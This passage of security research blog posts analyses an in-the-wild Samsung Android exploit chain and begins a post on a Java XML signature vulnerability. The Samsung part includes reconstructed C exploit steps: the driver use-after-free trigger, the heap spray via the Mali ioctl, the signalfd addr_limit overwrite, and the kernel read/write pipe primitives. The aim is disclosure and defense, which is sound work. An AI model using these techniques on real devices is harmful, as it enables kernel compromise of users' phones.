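    int s = socket(AF_UNIX, SOCK_SEQPACKET, 0);
    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    strcpy(addr.sun_path, "/dev/socket/logdr");
    connect(s, (struct sockaddr *)&addr, sizeof(addr));

    /* Request the main (0), system (3) and crash (4) log buffers. */
    const char *cmd = "stream lids=0,3,4";
    write(s, cmd, strlen(cmd) + 1);

    char buf[8192];
    ssize_t n;
    while ((n = read(s, buf, sizeof(buf) - 1)) > 0) {  /* one record per read */
        struct logger_entry_v4 *e = (struct logger_entry_v4 *)buf;
        if (e->hdr_size >= n)
            continue;
        buf[n] = '\0';
        char *payload = buf + e->hdr_size;
        if (strstr(payload, "display") || strstr(payload, "SDM"))
            return e->pid;   /* PID of android.hardware.graphics.composer */
    }
    return -1;
}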


Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path. 
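
That search might look like the following sketch, using only opendir/readlink over /proc/<PID>/fd/ (names are illustrative):

#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Resolve every fd symlink in /proc/<pid>/fd/ and report the target path
 * that contains "graphics/fb0", the DECON driver. */
static int find_fb0_path(int pid, char *out, size_t outlen) {
    char dirpath[64], linkpath[512];
    snprintf(dirpath, sizeof(dirpath), "/proc/%d/fd", pid);
    DIR *d = opendir(dirpath);
    if (!d)
        return -1;
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL) {
        snprintf(linkpath, sizeof(linkpath), "%s/%s", dirpath, ent->d_name);
        ssize_t n = readlink(linkpath, out, outlen - 1);
        if (n <= 0)
            continue;
        out[n] = '\0';
        if (strstr(out, "graphics/fb0")) {
            closedir(d);
            return 0;   /* out now holds the DECON device path */
        }
    }
    closedir(d);
    return -1;
}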


Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes. 


/**
 * struct sync_file - sync file to export to the userspace
 * @file:               file representing this fence
 * @sync_file_list:     membership in global file list
 * @wq:                 wait queue for fence signaling
 * @fence:              fence with the fences in the sync_file
 * @cb:                 fence callback information
 */
struct sync_file {
        struct file             *file;
        /**
         * @user_name:
         *
         * Name of the sync file provided by userspace, for merged fences.
         * Otherwise generated through driver callbacks (in which case the
         * entire array is 0).
         */
        char                    user_name[32];
#ifdef CONFIG_DEBUG_FS
        struct list_head        sync_file_list;
#endif

        wait_queue_head_t       wq;
        unsigned long           flags;

        struct dma_fence        *fence;
        struct dma_fence_cb cb;
};


The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.


static int decon_set_win_config(struct decon_device *decon,
                struct decon_win_config_data *win_data)
{
        int num_of_window = 0;
        struct decon_reg_data *regs;
        struct sync_file *sync_file;
        int i, j, ret = 0;

[...]

        num_of_window = decon_get_active_win_count(decon, win_data);
        if (num_of_window) {
                win_data->retire_fence = decon_create_fence(decon, &sync_file);
                if (win_data->retire_fence < 0)
                        goto err_prepare;
        } else {

[...]

        if (num_of_window) {
                fd_install(win_data->retire_fence, sync_file->file);
                decon_create_release_fences(decon, win_data, sync_file);
#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)
                regs->retire_fence = dma_fence_get(sync_file->fence);
#endif
        }

[...]

        return ret;
}


In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.


int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)
{
        struct dma_fence *fence;
        int fd = -EMFILE;

        fence = kzalloc(sizeof(*fence), GFP_KERNEL);
        if (!fence)
                return -ENOMEM;

        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,
                   decon->fence.context,
                   atomic_inc_return(&decon->fence.timeline));

        *sync_file = sync_file_create(fence);
        dma_fence_put(fence);
        if (!(*sync_file)) {
                decon_err("%s: failed to create sync file\n", __func__);
                return -ENOMEM;
        }

        fd = decon_get_valid_fd();
        if (fd < 0) {
                decon_err("%s: failed to get unused fd\n", __func__);
                fput((*sync_file)->file);
        }

        return fd;
}


The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 


void decon_create_release_fences(struct decon_device *decon,
                struct decon_win_config_data *win_data,
                struct sync_file *sync_file)
{
        int i = 0;

        for (i = 0; i < decon->dt.max_win; i++) {
                int state = win_data->config[i].state;
                int rel_fence = -1;

                if (state == DECON_WIN_STATE_BUFFER) {
                        rel_fence = decon_get_valid_fd();
                        if (rel_fence < 0) {
                                decon_err("%s: failed to get unused fd\n",
                                                __func__);
                                goto err;
                        }

                        fd_install(rel_fence, get_file(sync_file->file));
                }
                win_data->config[i].rel_fence = rel_fence;
        }
        return;
err:
        while (i-- > 0) {
                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {
                        put_unused_fd(win_data->config[i].rel_fence);
                        win_data->config[i].rel_fence = -1;
                }
        }
        return;
}


decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.


When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.


        if (num_of_window) {
-               fd_install(win_data->retire_fence, sync_file->file);
                decon_create_release_fences(decon, win_data, sync_file);
#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)
                regs->retire_fence = dma_fence_get(sync_file->fence);
#endif
        }

        decon_hiber_block(decon);

        mutex_lock(&decon->up.lock);
        list_add_tail(&regs->list, &decon->up.list);
+       atomic_inc(&decon->up.remaining_frame);
        decon->update_regs_list_cnt++;
+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);

        mutex_unlock(&decon->up.lock);
        kthread_queue_work(&decon->up.worker, &decon->up.work);

+       /*
+        * The code is moved here because the DPU driver may get a wrong fd
+        * through the released file pointer,
+        * if the user(HWC) closes the fd and releases the file pointer.
+        *
+        * Since the user land can use fd from this point/time,
+        * it can be guaranteed to use an unreleased file pointer
+        * when creating a rel_fence in decon_create_release_fences(...)
+        */
+       if (num_of_window)
+               fd_install(win_data->retire_fence, sync_file->file);

        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:


fake_file.f_u = 0x1010101;
fake_file.f_op = kaddr - 0x2071B0 + 0x1094E80;
fake_file.f_count = 0x7F;
fake_file.private_data = addr_limit_ptr;


The f_op member is set to signalfd_fops, for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address, also leaked using vulnerability #2.


The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver. 

/**
 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
 * @buffer: Pointer to the information
 * @len: Length
 * @padding: Padding
 *
 * The data provided is accessible through a debugfs file
 */
struct kbase_ioctl_mem_profile_add {
        __u64 buffer;
        __u32 len;
        __u32 padding;
};

#define KBASE_IOCTL_MEM_PROFILE_ADD \
        _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)


static int kbase_api_mem_profile_add(struct kbase_context *kctx,
                struct kbase_ioctl_mem_profile_add *data)
{
        char *buf;
        int err;

        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {
                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");
                return -EINVAL;
        }

        buf = kmalloc(data->len, GFP_KERNEL);
        if (ZERO_OR_NULL_PTR(buf))
                return -ENOMEM;

        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),
                        data->len);
        if (err) {
                kfree(buf);
                return -EFAULT;
        }

        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);
}



This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.


Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, they only apply to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020, so it makes sense that the exploit targeted devices running Android 10 and before, where DebugFS would have been mounted.


Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs.  The highlighted text reads: "Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices"


For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted. 


a51:/ $ getprop ro.build.fingerprint
samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys
a51:/ $ getprop ro.build.version.security_patch
2021-02-01
a51:/ $ uname -a
Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64
a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS
CONFIG_DEBUG_FS=y
a51:/ $ cat /proc/mounts | grep debug
/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0


Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.


#ifdef CONFIG_DEBUG_FS

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,
                                        size_t size)
{
        int err = 0;

        mutex_lock(&kctx->mem_profile_lock);

        dev_dbg(kctx->kbdev->dev, "initialised: %d",
                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {
                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {
                        err  = -ENOMEM;
                } else if (!debugfs_create_file("mem_profile", 0444,
                                        kctx->kctx_dentry, kctx,
                                        &kbasep_mem_profile_debugfs_fops)) {
                        err = -EAGAIN;
                } else {
                        kbase_ctx_flag_set(kctx,
                                           KCTX_MEM_PROFILE_INITIALIZED);
                }
        }

        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {
                kfree(kctx->mem_profile_data);
                kctx->mem_profile_data = data;
                kctx->mem_profile_size = size;
        } else {
                kfree(data);
        }

        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",
                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        mutex_unlock(&kctx->mem_profile_lock);

        return err;
}

#else /* CONFIG_DEBUG_FS */

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,
                                        size_t size)
{
        kfree(data);
        return 0;
}
#endif /* CONFIG_DEBUG_FS */


By writing the fake file structs as a single 0x2000-byte buffer rather than as 25 individual 0x140-byte buffers, the exploit writes its fake structs across two whole pages, which increases the odds of reallocating over the freed file struct.
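
A sketch of the groom-and-spray step under these assumptions: KBASE_IOCTL_TYPE is 0x80, the ioctl struct is the one shown above, and fake_file_140 is a caller-prepared 0x140-byte template holding the four member values listed earlier:

#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

struct kbase_ioctl_mem_profile_add {
    uint64_t buffer;
    uint32_t len;
    uint32_t padding;
};
/* 0x80 is assumed to be KBASE_IOCTL_TYPE on this driver version. */
#define KBASE_IOCTL_MEM_PROFILE_ADD \
    _IOW(0x80, 27, struct kbase_ioctl_mem_profile_add)

static void groom_and_spray(int mali_fd, const void *fake_file_140) {
    /* Churn the allocator: open and close 30,000+ files via memfd_create. */
    for (int i = 0; i < 30000; i++)
        close(syscall(__NR_memfd_create, "groom", 0));

    /* 25 copies of the 0x140-byte fake file struct fit in one 0x2000 buffer. */
    char spray[0x2000];
    memset(spray, 0, sizeof(spray));
    for (size_t off = 0; off + 0x140 <= sizeof(spray); off += 0x140)
        memcpy(spray + off, fake_file_140, 0x140);

    struct kbase_ioctl_mem_profile_add arg = {
        .buffer = (uint64_t)(uintptr_t)spray,
        .len = sizeof(spray),
        .padding = 0,
    };
    ioctl(mali_fd, KBASE_IOCTL_MEM_PROFILE_ADD, &arg);  /* two-page heap spray */
}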


The exploit then calls dup2 on the dangling fds. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that it successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of the fake file structures, f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.


To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
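
That verification could look like the following sketch (the debugfs path comes from the text above; names are illustrative):

#include <dirent.h>
#include <stdio.h>
#include <unistd.h>

/* After dup2() bumps the fake f_count from 0x7F to 0x80, find it by scanning
 * every mem_profile file that the spray created. */
static int reallocation_succeeded(int dangling_fd) {
    dup2(dangling_fd, 999);   /* increments f_count of whatever backs the fd */
    DIR *d = opendir("/sys/kernel/debug/mali/mem/");
    if (!d)
        return 0;
    struct dirent *ent;
    while ((ent = readdir(d)) != NULL) {
        char path[512];
        snprintf(path, sizeof(path),
                 "/sys/kernel/debug/mali/mem/%s/mem_profile", ent->d_name);
        FILE *f = fopen(path, "r");
        if (!f)
            continue;
        int c;
        while ((c = fgetc(f)) != EOF) {
            if (c == 0x80) {   /* a bumped refcount: the fake struct is live */
                fclose(f);
                closedir(d);
                return 1;
            }
        }
        fclose(f);
    }
    closedir(d);
    return 0;
}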

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  


Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.


signalfd(dangling_fd, 0xFFFFFF8000000000, 8);


According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).


int signalfd(int fd, const sigset_t *mask, int flags);


The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the sigmask of the signalfd_ctx struct.


typedef unsigned long sigset_t;

struct signalfd_ctx {
        sigset_t sigmask;
};


The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.


Let’s walk through how the signalfd source code updates the mask: 


SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,
                size_t, sizemask, int, flags)
{
        sigset_t sigmask;
        struct signalfd_ctx *ctx;

        /* Check the SFD_* constants for consistency.  */
        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);
        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
                return -EINVAL;

        if (sizemask != sizeof(sigset_t) ||
            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))
               return -EINVAL;
        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));
        signotset(&sigmask);                                      // [1]

        if (ufd == -1) {                                          // [2]
                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);
                if (!ctx)
                        return -ENOMEM;

                ctx->sigmask = sigmask;

                /*
                 * When we call this, the initialization must be complete, since
                 * anon_inode_getfd() will install the fd.
                 */
                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
                if (ufd < 0)
                        kfree(ctx);
        } else {                                                 // [3]
                struct fd f = fdget(ufd);
                if (!f.file)
                        return -EBADF;
                ctx = f.file->private_data;                      // [4]
                if (f.file->f_op != &signalfd_fops) {            // [5]
                        fdput(f);
                        return -EINVAL;
                }
                spin_lock_irq(&current->sighand->siglock);
                ctx->sigmask = sigmask;                         // [6] WRITE!
                spin_unlock_irq(&current->sighand->siglock);

                wake_up(&current->sighand->signalfd_wqh);
                fdput(f);
        }

        return ufd;
}


First the function modifies the mask that was passed in. The mask passed into the function is the set of signals that should be accepted via the file descriptor, but the sigmask member of the signalfd_ctx struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] make this change. The call to sigdelsetmask ensures that the SIGKILL and SIGSTOP signals are always blocked, so it clears bit 8 (SIGKILL) and bit 18 (SIGSTOP) in order for them to be set by the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).


The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer. 


The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks whether the underlying file’s f_op equals the signalfd_fops. This is why the f_op was set to signalfd_fops in the previous section. Finally at [6], the overwrite occurs. The user-provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.


The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFBFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We'll talk about why they're overwriting the addr_limit with USER_DS rather than KERNEL_DS in the next section. 
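
As a sanity check on this arithmetic, the following illustrative Python snippet (not exploit code, just a restatement of the two kernel calls) reproduces the transformation:

# Illustration only: reproduce signalfd's mask transformation.
SIGKILL_BIT = 1 << 8         # sigmask(SIGKILL), signal number 9
SIGSTOP_BIT = 1 << 18        # sigmask(SIGSTOP), signal number 19
U64 = 0xFFFFFFFFFFFFFFFF

def signalfd_stored_mask(mask_in_arg):
    # sigdelsetmask: force-clear SIGKILL/SIGSTOP so the NOT below sets them
    cleared = mask_in_arg & ~(SIGKILL_BIT | SIGSTOP_BIT) & U64
    # signotset: flip every bit
    return ~cleared & U64

assert ~(SIGKILL_BIT | SIGSTOP_BIT) & U64 == 0xFFFFFFFFFFFBFEFF
assert signalfd_stored_mask(0xFFFFFF8000000000) == 0x7FFFFFFFFF  # USER_DS
assert signalfd_stored_mask(0) == U64                            # KERNEL_DS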

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations, introduced in ARMv8.1 and ARMv8.2 respectively. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.


It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.


void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}


This technique works by first writing the contents of the user-space buffer into one end of the pipe. By then calling read with the kernel address you'd like to write to as the destination, those contents are drained out of the pipe into that kernel memory address.


With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.


Let's say we didn't set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that's not KERNEL_DS. PAN wouldn't block the access, but UAO wouldn't be enabled either. Without UAO enabled, the unprivileged load and store instructions are not able to access kernel memory.


The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and disabled when it is not.


/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}


The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:


void kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]             

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}


The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is set to USER_DS. At [1] the exploit writes the contents of buf to the pipe. The 8-byte USER_DS value is written to the pipe at [2].


The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the provided mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.


Now that the addr_limit is set to KERNEL_DS, the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit restores the addr_limit to USER_DS by reading back the value from the pipe that was written at [2] and writing it to the addr_limit. The exploit's function to read from kernel memory is the mirror image of this function.


I am deliberately not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process's context to vold. vold is the “Volume Daemon”, which is responsible for mounting and unmounting external storage. vold runs as root, and while it's a userspace service, it's considered kernel-equivalent as described in the Android documentation on security contexts. Because it's such a highly privileged security context, it makes a prime target for the SELinux context switch.


Screen shot of the "OS Kernel" section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says:  Functionality that: - is part of the kernel - runs in the same CPU context as the kernel (for example, device drivers) - has direct access to kernel memory (for example, hardware components on the device) - has the capability to load scripts into a kernel component (for example, eBPF) - is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).


As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of a different attack surface and “shape” than many of the Android exploits we've seen in the past. All three vulnerabilities in this chain were in the manufacturer's custom components rather than in the AOSP platform or the Linux kernel. It's also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety issues. Of the 10 other Android in-the-wild 0-days that we've tracked since mid-2014, only 2 were not memory corruption vulnerabilities.


The first vulnerability in this chain, the arbitrary file read and write CVE-2021-25337, was the foundation of the chain: it was used 4 different times and at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. Java components in Android devices don't tend to be the most popular targets for security researchers despite running at such a privileged level. This highlights an area for further research.


Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users through patch analysis and variant analysis, or to gain an understanding of what attackers already know. 


The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage. 


This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.


Gregor Samsa: Exploiting Java's XML Signature Verification

2 November 2022 at 11:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022.


While the vulnerability discussed in this post has been patched, vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction


XML Signatures are a typical example of a security protocol invented in the early 2000s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break their security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth-based OpenID Connect (OIDC), is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations. 


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources. 


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potentially malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures


Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. The XML signature standard (known as XMLDsig) instead tries to be robust against insignificant changes to the signed XML document: changing whitespace, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>

  <SignedInfo>

    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />

    <Reference URI="#signed-data">

       <Transforms>

       …

       </Transforms>

       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />

       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>

    </Reference>

  </SignedInfo>

  <SignatureValue>....</SignatureValue>

  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>

</Signature>


  • The SignedInfo child contains CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data. 

  • KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id. 

  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod.


